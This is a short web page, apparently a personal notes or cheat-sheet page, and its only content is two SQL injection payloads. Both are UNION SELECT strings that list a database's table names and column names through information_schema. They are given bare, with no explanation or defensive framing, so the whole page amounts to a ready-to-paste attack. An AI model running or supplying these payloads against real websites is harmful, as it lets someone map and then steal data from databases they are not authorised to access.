top of page

-1 union select group_concat(table_name) from information_schema.tables where table_schema=database()-- -

-1 union select group_concat(column_name) from information_schema.columns where table_schema=database()-- -

bottom of page